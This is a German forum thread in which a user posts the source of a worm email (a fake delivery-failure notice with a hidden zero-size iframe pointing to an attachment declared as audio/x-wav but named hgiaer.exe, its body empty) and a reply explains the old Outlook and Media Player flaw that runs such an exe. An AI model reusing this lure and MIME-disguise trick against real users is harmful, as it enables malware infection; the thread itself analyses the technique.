Christoph Schnauß: lustige Frechheit

hallo Forum,

unter den unzähligen mails mit dem gerade kursierenden Wurm, die mich heute erreicht haben, war an ganz versteckter Stelle auch eine, die ich letzten Endes sogar wieder lustig fand. Im Quelltext stand nach dem mail-Header drin:

Content-Type: text/html
Content-Transfer-Encoding: quoted-printable
<HTML>
<HEAD></HEAD>
<BODY>
<iframe src=3D"cid:njvutebbpfe" height=3D0 width=3D0></iframe>
<BR>I'm afraid =
the message returned below could not be delivered =
to one or more destinations.<BR>
<BR><BR><BR>Undelivered to <B>nldexynix@yahoo.com</B>
<BR><BR><BR>Message follows:<BR><BR><BR><BR>
</BODY></HTML>

--xztioylktchquso
Content-Type: audio/x-wav; name="hgiaer.exe"
Content-Transfer-Encoding: base64
Content-Id: <njvutebbpfe>

--xztioylktchquso--

Mehr nicht. Outlook Expreß, das ich zur Kontrolle mal angeschaltet habe, zeigt aber brav einen Anhang namens ="hgiaer.exe" an. Aber das Attachement existiert dann gar nicht. Und bis sich der iFrame aufgebaut hatte, wollte ich gewiß nicht warten.
Ist da ein "Trittbrettfahrer" unterwegs, der mit Vorspiegelung falscher Tatsachen bloß die Leute noch mehr verunsichern will, als sie es in den letzten Tagen ohnehin sind?

Grüße aus Berlin

Christoph S.

  1. Hi!

    nein, das ist eine jahrealte Lücke in Outlock/IE in Verbindung mit dem Mediaplayer. Ältere Versionen dieser Bugware starten den Medienplayer (ist ja audio/x-wav). Dieser stellt dann fest das es doch kein Audiofile ist, sondern eine exe und startet die.

    Viel Spaß

    Dominik